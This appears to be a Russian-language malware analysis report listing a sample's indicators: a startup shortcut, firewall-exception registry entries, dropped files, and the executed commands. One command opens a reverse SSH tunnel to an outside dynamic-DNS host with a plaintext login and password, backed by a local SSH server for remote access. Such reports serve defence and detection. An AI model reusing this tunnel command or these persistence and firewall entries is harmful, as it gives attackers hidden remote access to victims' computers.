Техническая информация
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\Diacostics.lnk
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] 'C:\Default\ComSystem.exe' = 'C:\Default\ComSystem.exe:*:Enabled:Diacnostics2'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] 'C:\Default\Surrogate.exe' = 'C:\Default\Surrogate.exe:*:Enabled:Diacnostics'
- 'C:\Default\ComSystem.exe' -ssh -R 50145:127.0.0.2:22 gen11.sytes.net -l gen10 -pw 2n16122N
- 'C:\Default\Surrogate.exe' -d -t -l -e0.0.0.0 -i127.0.0.2 -p22 -a
- '<SYSTEM32>\wscript.exe' "C:\Default\Surrogate.vbe"
- C:\Default\Surrogate.exe
- C:\Default\ComSystem.exe
- %TEMP%\~SBA.tmp
- C:\Default\Surrogate.vbe
- %TEMP%\Surrogate.0002
- <LS_APPDATA>\PUTTY.RND
- %TEMP%\ComSystem.0001
- %TEMP%\Surrogate.0001
- %TEMP%\~SB9.tmp
- %TEMP%\LSB3.tmp
- %TEMP%\~SB4.tmp
- %TEMP%\LSB1.tmp
- %TEMP%\LSB2.tmp
- %TEMP%\~SB7.tmp
- %TEMP%\~SB8.tmp
- %TEMP%\~SB5.tmp
- %TEMP%\~SB6.tmp
- %TEMP%\a8842160-97f7-11e4-4823-0001ed1a0029\x64.exe
- %TEMP%\~SB4.tmp
- %TEMP%\~SB8.tmp
- %TEMP%\LSB3.tmp
- %TEMP%\LSB2.tmp
- %TEMP%\~SB9.tmp
- %TEMP%\LSB1.tmp
- %TEMP%\~SBA.tmp
- %TEMP%\~SB6.tmp
- %TEMP%\~SB5.tmp
- %TEMP%\~SB7.tmp в %TEMP%\a8842160-97f7-11e4-4823-0001ed1a0029\x64.exe
- 'ge###.sytes.net':22
- DNS ASK ge###.sytes.net
- ClassName: 'Shell_TrayWnd' WindowName: ''